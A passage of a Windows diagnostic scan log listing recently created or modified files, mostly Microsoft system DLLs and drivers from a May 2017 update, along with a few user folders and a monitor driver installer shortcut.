2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07
18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\AppVEntSubsystemController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\LockHostingFramework.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe 2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv 2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys 
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys 2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ 
(Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll 2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) 